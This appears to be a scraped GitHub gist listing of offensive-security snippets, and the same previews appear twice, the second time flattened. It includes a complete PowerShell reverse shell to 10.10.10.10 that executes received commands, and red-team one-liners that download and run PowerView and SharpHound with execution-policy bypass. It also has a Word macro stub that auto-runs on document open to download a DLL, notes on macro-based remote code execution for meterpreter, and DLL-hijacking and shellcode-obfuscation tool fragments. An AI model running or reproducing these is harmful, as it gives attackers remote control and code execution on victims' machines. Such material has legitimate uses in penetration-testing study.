hastalamuerte

## cpl.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;

public class Test
{

## Empire_via_rundll-powershdll.vba
Sub AutoOpen()
    Debugging
End Sub

Sub Document_Open()
    Debugging
End Sub

Public Function Debugging() As Variant
    DownloadDLL

## Various-Macro-Based-RCEs.md

      
              1 file
            
          
              65 forks
            
          
              1 comment
            
          
              133 stars
            
          
                mgeeky
                / Various-Macro-Based-RCEs.md
            
            
              Last active
              January 14, 2024 16:43
            
              
                Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.
              
          
    This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector.
Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.
All of the below examples had been generated for using as a remote address: 192.168.56.101.
List:

Page substiution macro for luring user to click Enable Content
The Unicorn Powershell based payload


## powershell_reverse_shell.ps1
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

## RedTeam_CheatSheet.ps1
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

## RedTeam_CheatSheet.ps1
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

## autoelevate-1903.txt
Reference: https://www.researchgate.net/publication/319454675_Testing_UAC_on_Windows_10


Get-ChildItem "C:\Windows\System32\*.exe" | Select-String -pattern "<autoElevate>true</autoElevate>"


C:\Windows\System32\bthudtask.exe:78:          <autoElevate>true</autoElevate>
C:\Windows\System32\changepk.exe:194:            <autoElevate>true</autoElevate>
C:\Windows\System32\ComputerDefaults.exe:308:        <autoElevate>true</autoElevate>
C:\Windows\System32\dccw.exe:464:      <autoElevate>true</autoElevate>

## converToUUID.py
"""
Created for : https://blog.sunggwanchoi.com/eng-uuid-shellcode-execution/
Repo: https://github.com/ChoiSG/UuidShellcodeExec
"""
import uuid

def convertToUUID(shellcode):
	# If shellcode is not in multiples of 16, then add some nullbytes at the end
	if len(shellcode) % 16 != 0:
		print("[-] Shellcode's length not multiplies of 16 bytes")

## evilldll-gen.sh
#!/bin/sh

usage(){
        echo "# #################                Simple CPP to DLL Utility               ################# #"
        echo "# This tool has been maded to easily generate and compile a DLL to be used for DLL hijacking.#"
        echo "#                                                                                            #"
        echo "# ========================================================================================== #"
        echo "#                                                                                            #"
        echo "# Usage:                                                                                     #"
        echo "#   ./dll-gcc [Options] <input-file>                                                         #"

## Enumerate-URIHandlers.ps1
New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT -ErrorAction SilentlyContinue | Out-Null
$count = 0
try {
    Get-ChildItem HKCR:  -ErrorAction SilentlyContinue | ForEach-Object {
        if((Get-ItemProperty $_.PSPath -ErrorAction SilentlyContinue).PSObject.Properties.Name -contains "URL Protocol") {
            $name = $_.PSChildName
            $count += 1
            $line = "URI Handler {0:d4}:   {1}" -f $count, $name
            Write-Host $line
        }
	using System;
	using System.Runtime.InteropServices;
	using RGiesecke.DllExport;
	using System.Collections.ObjectModel;
	using System.Management.Automation;
	using System.Management.Automation.Runspaces;
	using System.Text;

	public class Test
	{
	Sub AutoOpen()
	Debugging
	End Sub

	Sub Document_Open()
	Debugging
	End Sub

	Public Function Debugging() As Variant
	DownloadDLL
	# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

	$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" \| Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
	# Domain Recon
	## ShareFinder - Look for shares on network and check access under current user context & Log to file
	powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess\|Out-File -FilePath sharefinder.txt"

	## Import PowerView Module
	powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

	## Invoke-BloodHound for domain recon
	powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
	Reference: https://www.researchgate.net/publication/319454675_Testing_UAC_on_Windows_10


	Get-ChildItem "C:\Windows\System32\*.exe" \| Select-String -pattern "<autoElevate>true</autoElevate>"


	C:\Windows\System32\bthudtask.exe:78: <autoElevate>true</autoElevate>
	C:\Windows\System32\changepk.exe:194: <autoElevate>true</autoElevate>
	C:\Windows\System32\ComputerDefaults.exe:308: <autoElevate>true</autoElevate>
	C:\Windows\System32\dccw.exe:464: <autoElevate>true</autoElevate>
	"""
	Created for : https://blog.sunggwanchoi.com/eng-uuid-shellcode-execution/
	Repo: https://github.com/ChoiSG/UuidShellcodeExec
	"""
	import uuid

	def convertToUUID(shellcode):
	# If shellcode is not in multiples of 16, then add some nullbytes at the end
	if len(shellcode) % 16 != 0:
	print("[-] Shellcode's length not multiplies of 16 bytes")
	#!/bin/sh

	usage(){
	echo "# ################# Simple CPP to DLL Utility ################# #"
	echo "# This tool has been maded to easily generate and compile a DLL to be used for DLL hijacking.#"
	echo "# #"
	echo "# ========================================================================================== #"
	echo "# #"
	echo "# Usage: #"
	echo "# ./dll-gcc [Options] <input-file> #"
	New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT -ErrorAction SilentlyContinue \| Out-Null
	$count = 0
	try {
	Get-ChildItem HKCR: -ErrorAction SilentlyContinue \| ForEach-Object {
	if((Get-ItemProperty $_.PSPath -ErrorAction SilentlyContinue).PSObject.Properties.Name -contains "URL Protocol") {
	$name = $_.PSChildName
	$count += 1
	$line = "URI Handler {0:d4}: {1}" -f $count, $name
	Write-Host $line
	}